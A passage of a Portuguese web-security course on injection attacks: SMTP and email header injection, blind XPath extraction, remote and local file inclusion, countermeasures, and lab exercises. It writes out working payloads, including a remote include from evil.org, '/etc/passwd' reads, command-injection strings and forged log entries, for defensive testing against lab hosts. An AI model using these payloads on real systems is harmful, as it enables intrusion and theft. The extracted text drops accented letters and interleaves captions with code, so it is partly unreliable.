cido aplicao.
Supondo que o cdigo responsvel por gerar os comandos SMTP da interao entre a apli-
cao e o servidor de e-mail fosse o representado na Figura 7.18, o resultado obtido com a
substituio de $message pelo valor exibido na Figura 7.17, bem como das demais variveis
pelos argumentos associados, seria o ilustrado na Figura 7.19, excetuando-se a numerao.
Observe-se que, com a injeo do contedo identificado pelas linhas 09 a 17, formaram-se
duas conversaes SMTP distintas, compostas pelas linhas 02 a 09 e 10 a 18, o que faz com
que duas mensagens de correio eletrnico sejam enviadas. Neste cenrio, se o servidor
estiver mal configurado, de modo a permitir o encaminhamento de mensagens de usurios
externos para outros domnios, qualquer destinatrio da internet poder ser especificado,
facilitando a vida dos spammers (pessoas que enviam spams).
$cmd = HELO localhost.PHP_EOL;
$cmd = $cmd.MAIL FROM:<.$from.>.PHP_EOL;
$cmd = $cmd.RCPT TO:<.$realto.>.PHP_EOL;
$cmd = $cmd.DATA.PHP_EOL;
$cmd = $cmd.From:.$from.PHP_EOL;
$cmd = $cmd.Subject: .$subject.PHP_EOL.PHP_EOL;

Figura 7.18
$cmd = $cmd.$message.PHP_EOL; Trecho de cdigo
que armazena em
$cmd = $cmd...PHP_EOL; $cmd os comandos
SMTP a serem en-
$cmd = $cmd.QUIT.PHP_EOL; viados ao servidor
de e-mails.
332
01 HELO localhost
02 MAIL FROM:<morpheus@esr.rnp.br>
03 RCPT TO:<supervisor@localhost>
04 DATA
05 From:morpheus@esr.rnp.br
06 Subject: Teste
07
08 Mensagem original.
09 .
10 MAIL FROM:<evil@evil.org>
11 RCPT TO:<outro.usuario@localhost>
12 DATA
13 From:evil@evil.org
14 To:outro.usuario@localhost
15 Subject:Mensagem falsa
16
17 Esta mensagem foi forjada!

Figura 7.19
Comandos SMTP 18 .
gerados a partir das
entradas fornecidas 19 QUIT
pelo usurio.
Outro erro comum, encontrado nesse tipo de funcionalidade, consiste em armazenar o q

endereo de destinatrio em um campo escondido do formulrio, e utilizar aquele dado
diretamente na composio da mensagem.
Como se sabe, informaes em poder de usurios no so confiveis, pois podem ser

manipuladas da maneira que quiserem. Assim, um ataque possvel nesse cenrio resume-se
em interceptar a requisio aplicao e incluir uma lista de destinatrios, separados por
vrgula, no lugar do endereo original.
A ltima vulnerabilidade abordada nesta seo baseia-se na utilizao do parmetro

opcional additional_headers da funo mail() de PHP, usado para adicionar os cabealhos
From, Cc e Bcc mensagem, que devem ser separados por caracteres de finalizao de
linha (\0d e \0a). O uso normal compreende a definio do remetente, conforme endereo
de correio eletrnico preenchido pelo usurio no formulrio da aplicao.
Por fim, se a aplicao permitir que o usurio fornea caracteres de final de linha, um q
usurio capaz de injetar os cabealhos Cc e Bcc, expandindo a lista de destinatrios
da mensagem, em aplicaes PHP que usam a funo mail().
Para exemplificar, considere-se o seguinte trecho de cdigo, observando que o ltimo par-
metro da funo mail() corresponde ao additional_headers:
333
$from=From: .$_POST[from];
$realto=$_POST[realto];
$subject=$_POST[subject];
$message=$_POST[message];
$ret = mail($realto, $subject, $message, $from);
Fornecendo um valor similar ao abaixo, para o parmetro from da requisio, consegue-se

realizar o ataque e injetar o cabealho desejado:
evil%40evil.org%0d%0aCc%3aoutro%40localhost
Note-se que a entrada utiliza codificao URL, o que implica que, em requisies POST, ela
deve ser fornecida por meio de um proxy de interceptao, para que no seja duplamente
codificada. O processo mais simples, no caso de requisies GET, pois o valor final do par-
metro pode ser definido diretamente na barra de endereos do navegador web.
Para verificar se uma dada aplicao vulnervel injeo de comandos SMTP e de cabea-
lhos de e-mail, o seguinte roteiro pode ser executado:
1. Liste todos os formulrios, identificados na fase de mapeamento, que parecem interagir

com o servio de correio eletrnico.
2. Para cada um deles, realize os seguintes testes:
2.1.Adulterao de destinatrio:
2.1.1. Verifique se o endereo do destinatrio especificado em um campo escondido.
2.1.2. Em caso positivo, altere o valor do campo para um e-mail externo que controla,
e veja se recebe a mensagem enviada, o que confirma a vulnerabilidade.
2.1.3 Se o teste anterior falhar, repita a verificao com um endereo local, para o
qual tenha acesso.
2.2.Injeo de cabealhos de e-mail:
2.2.1 Habilite um proxy de interceptao e envie, em seguida, nova mensagem, por

meio da aplicao.
2.2.2 Adicione %0d%0aCc%3aSeuEmail%40SeuDominio ao final do parmetro que

indica o remetente, e veja se recebe a mensagem na caixa de entrada da conta
especificada. Se isto acontecer, a aplicao est vulnervel injeo de cabea-
lhos de e-mail.
2.3.Injeo de comandos SMTP:
2.3.1 Insira no corpo da mensagem uma linha contendo apenas um ponto (.),
seguida por outras quaisquer, e submeta o formulrio.
2.3.2 Acesse a caixa de correio do destinatrio e veja se a mensagem chegou truncada,

o que indica o processamento do ponto como finalizador do comando DATA.
2.3.3 Caso o passo anterior no seja bem-sucedido, tente injetar uma conversao
inteira contendo os comandos MAIL, RCPT e DATA.
334
Injeo de XPath
XML XPath uma linguagem utilizada para acessar elementos de um documento XML, a q
Extensible Markup partir de um modelo de dados representado em formato de rvore. Uma consulta XPath
Language uma
devolve um conjunto de ns do modelo ou valores atmicos, como inteiros ou cadeias de
linguagem definida pelo
W3C que estabelece caracteres, por exemplo.
regras e formatos
para a codificao de Existem duas verses, 1.0 e 2.0, especificadas, respectivamente, em Clark e DeRose, 1999 e
documentos. Berglund et al., 2010, sendo que a ltima consiste em uma extenso da primeira e procura
fornecer compatibilidade s expresses legadas. O conjunto de funes adicionais forne-
cidas pela verso 2.0 facilita a explorao de aplicaes vulnerveis injeo de XPath,
porm, ela no suportada, atualmente, por todos os arcabouos de desenvolvimento.
Para executar ataques de injeo de XPath, necessrio ter, ao menos, um conhecimento

bsico da linguagem, que ser apresentado, nesta sesso, por meio de diversos exemplos
elaborados com base no documento ilustrado na Figura 7.20. O XML em questo corres-
ponde a uma pequena base de usurios de uma aplicao e pode ser representado grafica-
mente como na Figura 7.21.
<?xml version=1.0?>
<users>
<user id =100>
<account>esruser</account>
<password>esruser</password>
<name>Fulano de Tal</name>
<address>R: Um, 111</address>
<city>Campinas</city>
<phone>11 1111-1111</phone>
</user>
<user id =101>
<account>root</account>
<password>toor</password>
<name>Wolfgang Mozart</name>
<address>R: Dois, 222</address>

<city>Indaiatuba</city>
<phone>22 2222-2222</phone>
</user>
<user id =102>
Figura 7.20 <account>guest</account>

Documento XML
que descreve <password>guest</password>
contas de usurio.
335
<name>Albert Einstein</name>
<address>R: Tres, 333</address>
<city>Campinas</city>
<phone>33 3333-3333</phone>
</user>
<user id =103>
<account>dba</account>
<password>dba</password>
<name>Isaac Newton</name>
<address>R: Quatro, 444</address>
<city>Sao Paulo</city>
<phone>44 4444-4444</phone>
</user>
<user id =104>
<account>bobby</account>
<password>bobby</password>
<name>Bobby Fischer</name>
<address>R: Cinco, 555</address>
<city>Sao Paulo</city>
<phone>55 5555-5555</phone>
Figura 7.21
</user> Representao
em rvore do
</users> documento da
Figura 7.20.
raiz
usurios
usurio usurio
id = 100 id = 101
conta senha nome endereo cidade telefone conta senha nome endereo cidade telefone
esruser esruser Fulano R:Um,... Campinas 11 1111... root toor Wolfgang... R:Dois,... Indaiatuba 22 2222...
336
Uma das principais produes permitidas pela gramtica da linguagem XPath o loca-
tion path, doravante denominado, simplesmente, de caminho. Este tipo de expresso, do
qual se origina o nome XPath, permite referenciar elementos na rvore que representa o
documento XML. Por exemplo, o caminho /users/user/name seleciona todos os ns name
obtidos percorrendo-se, a partir da raiz, cada componente da expresso, da esquerda para
a direita. Ressalte-se que, enquanto o primeiro / denota o n raiz e indica um caminho
absoluto, as demais instncias deste caractere iniciam um novo passo no percurso.
possvel, tambm, utilizar caminhos relativos, que iniciam em um determinado ponto

da rvore, definido por um contexto, ou em qualquer localizao da estrutura. Para isso,
devem ser empregadas barras duplas (//), antes de um passo, como em //name, que faz
com que os ns name sob user sejam selecionados, bem como quaisquer outros ns, em
outras posies, que tenham o mesmo nome. importante destacar que se pode usar //
mais de uma vez em um mesmo caminho, para expressar mltiplos percursos relativos. Por
exemplo, o caminho //users//name seleciona todos os ns name que sejam descendentes
de elementos users, localizados em qualquer ponto da rvore. Porm, se em vez disso, o
caminho fornecido fosse /users/name, considerando que ele no existe, um conjunto vazio
de elementos resultaria da consulta.
Os cenrios abordados at aqui sempre resultam em um conjunto de elementos de mesmo

tipo, independente dos valores especficos que possuem. Muitas vezes, porm, o interesse
recai em ns particulares desse conjunto, os quais podem ser obtidos por meio do uso
de predicados, que devem ser definidos entre colchetes, aps cada passo aplicvel do
caminho. Para ilustrar, considere-se a seguinte expresso:
//user[account=esruser]/name
Ela seleciona todos os ns name sob elementos user, para os quais account seja igual a
esruser. Note-se que, neste caso, account e name so irmos na hierarquia, pois ambos
tm como n pai o elemento user. Isto extremamente importante, pois a expresso
dentro de um predicado somente pode referenciar elementos que estejam acessveis dentro
do contexto do passo. Assim, //user/name[account=esruser] no encontra nada, porque
no h n account sob name. Por outro lado, //user/name[../account=esruser] e //
user/name[parent::*/account=esruser] so vlidos, pois tanto .. como parent::* fazem
com que a comparao de account com esruser ocorra no nvel hierrquico superior.
A linguagem XPath aceita os operadores lgicos, aritmticos e relacionais tradicionais, per-

mitindo que consultas similares s seguintes sejam construdas:
1 //user[account=esruser and password=esruser]/name seleciona o n

name cujo valor Fulano de Tal.
1 //user[account=esruser and password=toor]/name no seleciona

nenhum n, porque no h elemento user cujos filhos account e password sejam
esruser e toor, respectivamente.
1 //user[account!=esruser]/name seleciona os ns name cujos valores so

Wolfgang Mozart, Albert Einstein, Isaac Newton e Bobby Fischer.
1 //user[@id<102]/name seleciona os ns name cujos valores so Fulano de Tal e

Wolfgang Mozart. Observe-se que a expresso @id denota o atributo id de ele-
mentos user e a forma abreviada de attribute::id.
337
Alm desses operadores, algumas das funes existentes na linguagem so fundamentais
para a execuo dos ataques:
1 count() retorna o nmero de ns do conjunto passado como argumento.

1 name() devolve o nome do primeiro n, considerando-se a ordem do documento, do
conjunto passado como argumento.
1 position() retorna um nmero que corresponde posio da expresso avaliada,

dentro do contexto.
1 string-length() retorna o comprimento de uma cadeia de caracteres.

1 substring() retorna um pedao contnuo de uma cadeia de caracteres.
Agora que uma breve introduo linguagem XPath foi apresentada, possvel prosseguir
ao ataque de injeo que a envolve.
O problema raiz que leva vulnerabilidade o mesmo que o das demais injees, q
isto , emprego de informaes no validadas de usurios, na construo dinmica de
consultas, por meio de concatenao.
Por exemplo, considere uma aplicao que exibe informaes de usurios contidas em um
documento XML, desde que sejam fornecidas credenciais vlidas de acesso. Em tal cenrio,
seja a consulta XPath construda por meio do seguinte trecho de cdigo:
$uid=$_POST[uid];
$pwd=$_POST[pwd];
...
$users = $xml->xpath(/users/user[account=.$uid. and password=
.$pwd.]);
Se forem fornecidos os valores esruser e esruser para uid e pwd, respectivamente, a

consulta XPath ilustrada a seguir executada:
/users/user[account=esruser and password=esruser]
E o n user, cujo id igual a 100, selecionado, pois os valores de account e password

esto corretos. Neste cenrio, embora a verificao desses elementos seja sempre reali-
zada, um usurio malicioso pode acessar informaes alheias, sem conhecer senha alguma.
Basta, para isso, informar como uid o valor root or 1=1 e, como pwd, um valor qual-
quer, o que resulta na seguinte consulta, com predicado adulterado:
/users/user[account=root or 1=1 and password=P]

A expresso ser avaliada como verdadeira para todo elemento que tenha account igual a
root, uma vez que o operador or injetado necessita de apenas um operando verdadeiro
para dar esse resultado.
Analisando os exemplos acima, fcil perceber a similaridade do ataque com a injeo de q

SQL. Segundo Forbes e Siddhart (2012), porm, uma grande vantagem da injeo de XPath
sobre a de SQL que no existe o conceito de usurio ou permisso em um documento
XML, como ocorre em bancos de dados. Portanto, um usurio malicioso pode obter toda
informao contida no documento, caso seja acessado por uma aplicao vulnervel.
338
O seguinte roteiro de teste pode ser executado para verificar a presena de campos vulne-
rveis injeo de XPath em uma aplicao web. Para cada item de entrada identificado na
fase de mapeamento:
1. Fornea os smbolos [, ], ( e ) e *, um por vez, e veja se um erro induzido na apli-

cao, o que indicaria um campo potencialmente vulnervel.
2. Fornea o valor abaixo e veja se algum resultado apresentado:
or true() or
3. Se nenhum erro ocorrer, significa que a aplicao interpretou a expresso fornecida e

vulnervel injeo de XPath.
Injeo de XPath s cegas

O ataque de injeo de XPath s cegas (Klein, 2005) funciona de maneira similar s contra- q
partes baseadas em linguagem SQL e em filtros LDAP, nas quais so realizadas perguntas
booleanas, para extrao de um bit de informao por vez. A tcnica til quando a
injeo, embora bem-sucedida, no permite a visualizao do resultado do ataque.
Por exemplo, a aplicao pode retornar somente o nmero de ns que satisfazem a

expresso, mas no o contedo deles, que constitui o objetivo a ser alcanado. Como
j se sabe, para um ataque s cegas funcionar, deve ser possvel identificar quando a
expresso injetada verdadeira ou falsa, o que pode ser obtido por meio de diferenas
entre as pginas de resposta fornecidas pela aplicao.
Considere-se a aplicao ilustrada na Figura 7.22(a), que conta quantos usurios, presentes
no documento XML da Figura 7.22 moram na cidade especificada, e que produz o resultado
Figura 7.22
Aplicao que faz exibido na Figura 7.22(b). O sistema pode utilizar a funo count() de XPath, para descobrir
consulta XPath: de maneira direta o nmero de ns que atendem ao critrio de busca, ou recuperar esse
(a) Interface conjunto e realizar a contagem de elementos, por meio de cdigo da lgica de negcio. Em
do sistema.
(b) Resultado qualquer dos dois casos, razovel supor a existncia de uma expresso que compara o
da pesquisa. nome de cidade de cada n, com a entrada fornecida pelo usurio.
(a) (b)
Por se tratar de um texto, o valor digitado deve ser delimitado por aspas simples ou duplas,
na construo da consulta XPath. Assim, para testar a existncia da vulnerabilidade, pode-se

fazer a pesquisa abaixo, e verificar se o total de usurios encontrados alterado:
Campinas and a=a
Assumindo que o resultado anterior se mantm, a pergunta booleana que se deseja fazer
pode ser includa do seguinte modo:
Campinas and <pergunta booleana> and a=a
339
Neste caso, se a pergunta for avaliada como verdadeira, a contagem permanece inalte-
rada; seno, o total de usurios contabilizado como zero. A reconstruo do documento
XML completo, a partir das perguntas injetadas, pode ser realizada, por meio do algoritmo
ilustrado na Figura 7.23 (Forbes e Siddhart, 2012). Observe-se que um dos pilares do mtodo
consiste na recuperao de nomes e valores.
1. Obtenha o nome do n corrente.
2. Obtenha o nmero de atributos do n corrente.
3. Para cada atributo:
3.1. Obtenha o nome.
3.2. Obtenha o valor.
4. Obtenha o nmero de comentrios.
5. Para cada comentrio:
5.1. Obtenha o valor do comentrio.
6. Obtenha o nmero de ns-filhos.
7. Para cada n-filho: Figura 7.23

Algoritmo para
7.1. Execute o Passo #1. reconstruo do
documento XML por
8. Obtenha o contedo textual do n corrente. meio de injeo de
XPath s cegas.
Para exemplificar esta tcnica bsica e fundamental, vejamos como obter o nome do n
principal do documento. A tarefa inicial consiste em descobrir o tamanho do nome do ele-
mento, por meio das funes string-length() e name():
Campinas and string-length(name(/*))=1 and a=a
...
Em seguida, deve-se descobrir o valor do primeiro smbolo do nome da raiz, empregando-se

a funo substring():
Campinas and substring(name(/*),1,1)=a and a=a
Campinas and substring(name(/*),1,1)=b and a=a

...
Campinas and substring(name(/*),1,1)=u and a=a
O processo deve ser repetido para as demais letras do nome, resultando, no exemplo dado,
no valor users. Depois disso, procede-se descoberta do nmero de atributos do n
users (Passo #2), que zero:
Campinas and count(/users/attribute::*)=0 and a=a
O mesmo ocorrendo com o nmero de comentrios:
340
Campinas and count(/users/child::comment())=0 and a=a
Mas no para o nmero de ns-filhos:
Campinas and count(/users/child::*)=1 and a=a
...
Campinas and count(/users/child::*)=5 and a=a
Sempre que um n tiver mais de um filho, a funo position() deve ser empregada para
referenciar o descendente correto. Por exemplo, para se descobrir o tamanho do nome do
primeiro n-filho, as seguintes consultas devem ser efetuadas:
Campinas and string-length(name(/users/child::*[position()=1]))=1

and a=a
...
Campinas and string-length(name(/users/child::*[position()=1]))=4

and a=a
Por fim, observe-se como o valor textual de um elemento pode ser recuperado, uma vez
descobertos todos os nomes dos passos do caminho:
Tamanho do texto
Campinas and string-length(/users/user[position()=1]/name)=1 and

a=a
...
Campinas and string-length(/users/user[position()=1]/name)=13 and

a=a
Primeira letra do texto
Campinas and substring((/users/user[position()=1]/name),1,1)=A and

a=a
...
Campinas and substring((/users/user[position()=1]/name),1,1)=F and

a=a
Demais letras do texto

Para recuperar as demais letras, devem ser feitas consultas semelhantes, apenas variando-se
o segundo parmetro da funo substring().
Esta tcnica gera um grande volume de requisies, para obter o mnimo de informa- q
es do documento. Uma pequena melhoria pode ser obtida, realizando-se uma busca
binria, em cada faixa de caracteres vlidos, mas esta ainda no uma soluo ideal,
do ponto de vista de eficincia. A resposta a esse problema dada na verso 2.0 da lin-
guagem, com a introduo da funo string-to-codepoints(), com a qual se pode restringir
o espao de busca de maneira bem mais otimizada (Forbes e Siddhart, 2012).
341
A cobertura deste e outros avanos contemplados pela nova especificao, entretanto,
esto alm do escopo do presente trabalho.
Incluso de arquivos
Algumas linguagens, como PHP, permitem incluir e avaliar dinamicamente um arquivo q
como parte do cdigo sendo executado. Essa funcionalidade comumente empregada
em sistemas que permitem ao usurio selecionar a lngua a ser utilizada ou o pas em
que se encontra, e, a partir da resposta, realizam a adaptao das mensagens, por
meio da incluso de arquivos especficos de cada idioma (Stuttard e Pinto, 2007). Se a
aplicao, simplesmente, utiliza o valor de um parmetro da requisio como argumento
da funo de incluso, um usurio malicioso pode fazer com que arquivos remotos ou
locais sejam injetados, durante o processo de gerao da resposta pela aplicao.
Note-se que, em PHP, o comando include utilizado com o propsito mencionado, permitindo
incluir arquivos remotos, caso a diretiva allow_url_include esteja definida com o valor On.
Para ilustrar o ataque, considere-se a aplicao exibida na Figura 7.24, que realiza uma
requisio GET, contendo um parmetro country, quando o usurio clica em Prosseguir.
O parmetro pode assumir os valores br e us para Brasil e Estados Unidos, respec-
tivamente, sendo concatenado com a cadeia de caracteres .php, no lado do servidor, e
passado para a funo include.
Figura 7.24
Exemplo de aplica-
o vulnervel in-
cluso de arquivos.
O que acontece se um valor como o seguinte definido para o parmetro em questo?
http%3A%2F%2Fwww.evil.org%2Fevil
Neste caso, a seguinte requisio realizada aplicao:
http://filei.esr.rnp.br/select.php?country=http%3A%2F%2Fwww.evil.
org%2Fevil&Submit1=Prosseguir
A qual faz com que o arquivo http://www.evil.org/evil.php seja includo, dinamicamente,

no corpo de select.php, e executado em seguida. Considere-se uma aplicao ligeiramente

diferente, que, em vez do cdigo de pas, passa o nome de arquivo a ser includo como
parmetro. Esta pequena modificao no sistema introduz uma nova vulnerabilidade, que
permite visualizar quaisquer arquivos que sejam acessveis conta de sistema operacional
usada pelo servidor web. Para alcanar este objetivo, pode-se especificar o nome do arquivo
local desejado, conforme o exemplo abaixo, o qual resulta na exibio de /etc/passwd:
342
http://filei.esr.rnp.br/select2.php?country=%2Fetc%2Fpasswd&Submit1=
Prosseguir
Para verificar se aplicaes so vulnerveis a estes dois ataques, os testes a seguir podem
ser realizados. Para cada item de entrada identificado na fase de mapeamento que tenha
grande chance de ser usado em um comando de incluso de arquivos:
1. Inspecione o cdigo-fonte e veja se o valor do item de entrada corresponde a um nome

de arquivo.
1.1.Em caso positivo, intercepte a requisio e substitua-o pelo nome de outro arquivo
que se sabe estar no servidor. Verifique se a resposta apresenta algum indicativo de
que o arquivo foi includo e processado, o que indica a presena da vulnerabilidade.
1.2.Seno, intercepte a requisio e o substitua pelo nome, sem extenso, de outro

arquivo de mesmo tipo que se sabe estar no servidor. Verifique se a resposta apre-
senta algum indicativo de que o arquivo foi includo e processado, o que indica a
presena da vulnerabilidade.
1.3.Repita o Passo 1.1, porm usando no lugar do nome de arquivo uma URL para um
recurso que se tem controle.
Contramedidas
As principais medidas que podem ser adotadas, para evitar a ocorrncia dos mais q
diversos ataques de injeo esto listadas a seguir:
1 Gerais
2 Considere que toda informao fornecida por usurios maliciosa e, assim, antes
de process-la, verifique se ela est de acordo com valores reconhecidamente
vlidos para o campo ou parmetro. Complementarmente, restrinja o tamanho do
campo ao mximo permitido.
2 No submeta a um interpretador um comando construdo dinamicamente, por

meio da concatenao direta de valores controlados pelo usurio.
1 Injeo de comandos de sistema operacional

2 Se for necessrio solicitar servios ao sistema operacional, use funes da linguagem
na qual a aplicao desenvolvida, que sejam especficas para o propsito desejado.
1 Injeo em trilhas de auditoria

2 Para cada registro individual de trilha de auditoria, calcule e armazene a assinatura
digital ou um cdigo de autenticao de mensagem.
2 Adicione, para cada registro de trilha de auditoria, um carimbo de tempo confivel,

de quando o evento aconteceu.
1 Poluio de parmetros HTTP

2 Ao obter o valor de um parmetro de requisio HTTP, verifique se no foram enviadas

mltiplas instncias do mesmo elemento e se ele foi encaminhado pelo canal correto.
343
1 Injeo em filtros LDAP q
2 Utilize sempre verses atualizadas do servidor LDAP.
2 Estabelea um mximo de elementos que podem ser recuperados por meio de
uma consulta.
2 Realize a pesquisa apenas no ramo necessrio do diretrio LDAP, em vez de na

rvore inteira.
1 Injeo de comandos SMTP e de cabealhos de e-mail

2 Utilize as funcionalidades providas pelo arcabouo de desenvolvimento, para o
envio de mensagens de correio eletrnico, em vez de estabelecer uma conver-
sao SMTP direta com o servidor.
2 Se a interao direta com o servidor de correio eletrnico for necessria, filtre as

linhas do corpo da mensagem que contenham somente um ponto (.).
2 Quando o destinatrio da mensagem for fixo, obtenha o endereo dele sempre no

lado servidor da aplicao.
2 Configure o servidor de e-mails para que no encaminhe mensagens de usurios

externos a outros domnios.
1 Injeo de XPath
2 Se o arcabouo de desenvolvimento possuir uma funo de consulta parametri-
zada, sempre a utilize.
2 Quando XPath 2.0 for utilizado, restrinja o acesso funo doc().

2 Nunca deixe que o cdigo da aplicao acesse outros documentos XML, que no
aqueles explicitamente permitidos.
1 Incluso de arquivos
2 Nunca passe dados fornecidos pelo usurio para funes de incluso dinmica
de arquivos.
2 Caso a escolha do arquivo a ser includo dependa de informaes fornecidas

pelo usurio, verifique se o nome resultante est presente em uma lista de
recursos permitidos.
2 Desabilite a incluso de arquivos remotos.
Medidas contra ataques
Quais as melhores medidas contra ataques de injeo?
344
Apndice Gramtica para representao textual de filtros de
busca LDAP
A seguinte gramtica, que define a representao textual de filtros de busca LDAP, consiste em
uma reproduo completa do encontrado nos documentos RFC 4515 (Smith e Howes, 2006) e
RFC 4512 (Zeilenga, 2006b).
filter = LPAREN filtercomp RPAREN
filtercomp = and / or / not / item
and = AMPERSAND filterlist
or = VERTBAR filterlist
not = EXCLAMATION filter
filterlist = 1*filter
item = simple / present / substring / extensible
simple = attr filtertype assertionvalue
filtertype = equal / approx / greaterorequal / lessorequal
equal = EQUALS
approx = TILDE EQUALS
greaterorequal = RANGLE EQUALS
lessorequal = LANGLE EQUALS
extensible = ( attr [dnattrs]
[matchingrule] COLON EQUALS assertionvalue )
/ ( [dnattrs]
matchingrule COLON EQUALS assertionvalue )
present = attr EQUALS ASTERISK
substring = attr EQUALS [initial] any [final]
initial = assertionvalue
any = ASTERISK *(assertionvalue ASTERISK)
final = assertionvalue
attr = attributedescription
; The attributedescription rule is defined in
; Section 2.5 of [RFC4512].
dnattrs = COLON dn
matchingrule = COLON oid
assertionvalue = valueencoding
345
; The <valueencoding> rule is used to encode an
<AssertionValue>
; from Section 4.1.6 of [RFC4511].
valueencoding = 0*(normal / escaped)
normal = UTF1SUBSET / UTFMB
escaped = ESC HEX HEX
DIGIT = %x30 / LDIGIT ; 0-9
LDIGIT = %x31-39 ; 1-9
HEX = DIGIT / %x41-46 / %x61-66 ; 0-9 / A-F / a-

f
UTF1SUBSET = %x01-27 / %x2B-5B / %x5D-7F
; UTF1SUBSET excludes 0x00 (NUL), LPAREN,
; RPAREN, ASTERISK, and ESC.
EXCLAMATION = %x21 ; exclamation mark (!)
AMPERSAND = %x26 ; ampersand (or AND symbol) (&)
LPAREN = %x28 ; left paren (()
RPAREN = %x29 ; right paren ())
ASTERISK = %x2A ; asterisk (*)
COLON = %x3A ; colon (:)
LANGLE = %x3C ; left angle bracket (<)
EQUALS = %x3D ; equals sign (=)
RANGLE = %x3E ; right angle bracket (>)
ESC = %x5C ; backslash (\)
VERTBAR = %x7C ; vertical bar (or pipe) (|)
TILDE = %x7E ; tilde (~)
UTFMB = UTF2 / UTF3 / UTF4
UTF0 = %x80-BF
UTF1 = %x00-7F
UTF2 = %xC2-DF UTF0
UTF3 = %xE0 %xA0-BF UTF0 / %xE1-EC 2(UTF0) /
%xED %x80-9F UTF0 / %xEE-EF 2(UTF0)
UTF4 = %xF0 %x90-BF 2(UTF0) / %xF1-F3 3(UTF0) /
%xF4 %x80-8F 2(UTF0)
346
Gramtica da linguagem XPath 1.0
A gramtica abaixo, extrada de Clark e DeRose (1999), especifica a linguagem XPath 1.0.
LocationPath ::= RelativeLocationPath
| AbsoluteLocationPath
AbsoluteLocationPath ::= / RelativeLocationPath?
| AbbreviatedAbsoluteLocationPath
RelativeLocationPath ::= Step
| RelativeLocationPath / Step
| AbbreviatedRelativeLocationPath
Step ::= AxisSpecifier NodeTest Predicate*
| AbbreviatedStep
AxisSpecifier ::= AxisName ::
| AbbreviatedAxisSpecifier
AxisName ::= ancestor
| ancestor-or-self
| attribute
| child
| descendant
| descendant-or-self
| following
| following-sibling
| namespace
| parent
| preceding
| preceding-sibling
| self
NodeTest ::= NameTest

| NodeType ( )
| processing-instruction ( Literal
)
Predicate ::= [ PredicateExpr ]
PredicateExpr ::= Expr
AbbreviatedAbsoluteLocationPath ::=
347
// RelativeLocationPath
AbbreviatedRelativeLocationPath ::=
RelativeLocationPath // Step
AbbreviatedStep ::= .
| ..
AbbreviatedAxisSpecifier::= @?
Expr ::= OrExpr
PrimaryExpr ::= VariableReference
| ( Expr )
| Literal
| Number
| FunctionCall
FunctionCall ::= FunctionName ( ( Argument ( ,
Argument )* )? )
Argument ::= Expr
UnionExpr ::= PathExpr
| UnionExpr | PathExpr
PathExpr ::= LocationPath
| FilterExpr
| FilterExpr / RelativeLocationPath
| FilterExpr // RelativeLocationPath
FilterExpr ::= PrimaryExpr
| FilterExpr Predicate
OrExpr ::= AndExpr
| OrExpr or AndExpr
AndExpr ::= EqualityExpr

| AndExpr and EqualityExpr
EqualityExpr ::= RelationalExpr
| EqualityExpr = RelationalExpr
| EqualityExpr != RelationalExpr
RelationalExpr ::= AdditiveExpr
| RelationalExpr < AdditiveExpr
| RelationalExpr > AdditiveExpr
348
| RelationalExpr <= AdditiveExpr
| RelationalExpr >= AdditiveExpr
AdditiveExpr ::= MultiplicativeExpr
| AdditiveExpr + MultiplicativeExpr
| AdditiveExpr - MultiplicativeExpr
MultiplicativeExpr ::= UnaryExpr
| MultiplicativeExpr MultiplyOperator
UnaryExpr
| MultiplicativeExpr div UnaryExpr
| MultiplicativeExpr mod UnaryExpr
UnaryExpr ::= UnionExpr
| - UnaryExpr
ExprToken ::= ( | ) | [ | ] | . | .. | @
| , | ::
| NameTest
| NodeType
| Operator
| FunctionName
| AxisName
| Literal
| Number
| VariableReference
Literal ::= [^]*
| [^]*
Number ::= Digits (. Digits?)?
| . Digits
Digits ::= [0-9]+

Operator ::= OperatorName
| MultiplyOperator
| / | // | | | + | - | = |
!=
| < | <= | > | >=
OperatorName ::= and | or | mod | div
349
MultiplyOperator ::= *
FunctionName ::= QName - NodeType
VariableReference ::= $ QName
NameTest ::= *
| NCName : *
| QName
NodeType ::= comment
| text
| processing-instruction
| node
ExprWhitespace ::= S
350
Atividade 1 Injeo de comandos de sistema operacional
Esta atividade tem por objetivo ilustrar as diversas tcnicas que podem ser usadas para
injeo de comandos de sistema operacional. Para inici-la, carregue as mquinas virtuais
do aluno e do servidor (Fedora) e execute o roteiro na primeira delas. O propsito desta ati-
vidade introduzir os conceitos de ataques de injeo de comandos de sistema operacional.
2. Acesse http://oscmdi.esr.rnp.br/.
3. Digite www.esr.rnp.br no campo Nome de domnio e clique em Resolver nome.
4. Pressione Alt + [Seta para esquerda], para retornar pgina anterior.
5. Digite www.esr.rnp.br; no campo Nome de domnio, clique em Resolver nome e veja se o

resultado difere do Passo 3. Que se pode concluir com isso?
7. Fornea o seguinte texto para o campo Nome de domnio e clique em Resolver nome:
www.esr.rnp.br;cat /etc/passwd
8. A injeo de comando de sistema operacional funcionou?
Caracteres especiais
O objetivo desta atividade testar os diversos caracteres especiais que permitem sub-
misso de mltiplos comandos ao sistema operacional.
1. Digite o seguinte texto no campo Nome de domnio e clique em Resolver nome:
www.esr.rnp.br | ls -l /
2. Como a sada do comando ls foi concatenada original?

www.esr.rnp.br & ls -l /
5. Como a sada do comando ls foi concatenada original?
351
www.esr.rnp.br && ls -l /
8. O que mudou em relao ao Passo 14?
www.esr.rnp.br || ls -l /
11. Por que o resultado do comando injetado no foi exibido?
Introduo de pausa na execuo

Nesta atividade, a introduo de pausas na execuo, para deteco de aplicaes vulner-
veis, ser explorada.
www.esr.rnp.br; ping -c 15 localhost
2. Por que a pausa acontece?
Atividade 2 Injeo em trilhas de auditoria

O propsito da presente atividade introduzir ao aluno os mtodos que podem ser usados
para injeo de registros em trilhas de auditoria, quando estas so armazenadas em
arquivos de texto puro. Todos os passos devem ser executados na mquina virtual do aluno,
e altamente recomendado que se tente traar a estratgia de explorao, antes de seguir
o roteiro fornecido.
2. Acesse http://logi.esr.rnp.br/logfile e veja os registros contidos na trilha de auditoria.
3. Acesse http://logi.esr.rnp.br.
4. Fornea esr e senha para os campos Usurio e Senha, respectivamente, e clique em Login.
6. Acesse novamente http://logi.esr.rnp.br/logfile e clique no cone Reload current page, caso

a pgina no seja atualizada.
7. Note que o identificador de usurio foi adicionado ao final do registro.
8. Acesse novamente http://logi.esr.rnp.br.
352
11. No WebScarab, clique na aba Proxy e marque Intercept Requests.
12. Retorne ao Firefox, fornea admin e senha para os campos Usurio e Senha, respecti-
vamente, e clique em Login.
13. No WebScarab, acesse a aba Text na segunda seo da tela de interceptao.
14. Altere o valor do parmetro userid para:
admin.%0a[dd/mm/yyyy - hh:mm:ss] Conta admin se conectou com sucesso
